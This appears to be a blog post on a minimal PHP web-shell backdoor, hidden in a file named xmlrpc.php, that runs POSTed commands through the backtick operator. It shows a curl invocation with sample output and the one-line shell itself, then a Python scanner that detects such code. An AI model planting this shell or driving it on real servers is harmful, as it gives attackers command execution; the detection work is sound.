This is one of the smallest backdoors that I am aware of that allows you to run server commands that are sent to it via a POST request.
Its small footprint is due to its use of the backtick operator as shorthand for the PHP function `shell_exec()`:
Use of the backtick operator `` is identical to shell_exec().
shell_exec — Execute command via shell and return the complete output as a string
In order to use such a backdoor all you need to do is submit a POST request to the file containing the minishell. In this example the file is named `xmlrpc.php` and I submit the POST using the `curl` command in a bash terminal:
```
└──╼ curl "localhost/xmlrpc.php" --data-raw "0=ls+-lhart+wordpress/"
total 27M
-r--r--r-- 1 www-data www-data 31 Aug 14 2019 protecc_me.php
-rwxrwxrwt 1 www-data www-data 1.5K Jan 13 2020 1.css
-rwxrwxrwt 1 www-data www-data 3.3K Jan 13 2020 bg1.png
-rwxrwxrwt 1 www-data www-data 1.6K Feb 24 2020 wp-atom2.php
-rwxrwxrwt 1 www-data www-data 0 Feb 24 2020 favicon.ico
-rwxrwxrwt 1 www-data www-data 418 Feb 24 2020 index.php-bkup
-rwxrwxrwt 1 www-data www-data 162 Mar 8 2020 w.txt
...
```
Just be sure to include the `0` variable and then the URL-encoded command that you want to run. The command I used for the example was `ls -lhart wordpress/` but you can do a lot more than just `ls`ing directories with it.
The only problem is that if there is a firewall in use it should detect and prevent the POST request from going through since it is clearly malicious.
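As an added example (not code from the original post), one way to hunt for this kind of minishell on disk is to flag PHP source that uses the backtick operator or `shell_exec()`, and to escalate when request input such as `$_POST` reaches it. The function name, regexes and sample files below are constructed for illustration; the scanner is a heuristic, not a full PHP parser.

```python
import re

# Comments and quoted strings are matched only so they can be skipped; a
# backtick-delimited span is PHP's execution operator and is captured.
_TOKEN = re.compile(r"""
      //[^\n]* | \#[^\n]* | /\*.*?\*/     # comments
    | '(?:\\.|[^'\\])*'                   # single-quoted string
    | "(?:\\.|[^"\\])*"                   # double-quoted string
    | `(?P<exec>(?:\\.|[^`\\])*)`         # execution operator
""", re.S | re.X)
_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")   # request superglobals
_CALL = re.compile(r"\bshell_exec\s*\(([^;]*)", re.I)


def scan_php(source):
    """Return sorted (line, kind) findings for one PHP source string."""
    findings = []

    def visit(m):
        body = m.group("exec")
        if body is not None:
            kind = "backtick+request-input" if _INPUT.search(body) else "backtick"
            findings.append((source.count("\n", 0, m.start()) + 1, kind))
        # Blank the token but keep its length and newlines, so offsets in the
        # blanked copy still line up with the original source.
        return re.sub(r"[^\n]", " ", m.group(0))

    code = _TOKEN.sub(visit, source)
    for m in _CALL.finditer(code):
        args = source[m.start(1):m.end(1)]   # original text, strings included
        kind = "shell_exec+request-input" if _INPUT.search(args) else "shell_exec"
        findings.append((code.count("\n", 0, m.start()) + 1, kind))
    return sorted(findings)


# Constructed sample files for illustration, not taken from a real site.
SAMPLES = {
    "tiny.php": "<?php echo `$_POST[0]`;",
    "status.php": "<?php\n// old: `$_GET[c]`\n$up = `uptime`;\necho 'use `ls` here';\n",
    "run.php": '<?php\n$o = shell_exec("ls " . $_REQUEST["d"]);\n',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        for line, kind in scan_php(src):
            print(f"{name}:{line}: {kind}")
```

Text outside `<?php` tags is tokenized the same way, so hits in template-heavy files are leads to review rather than verdicts.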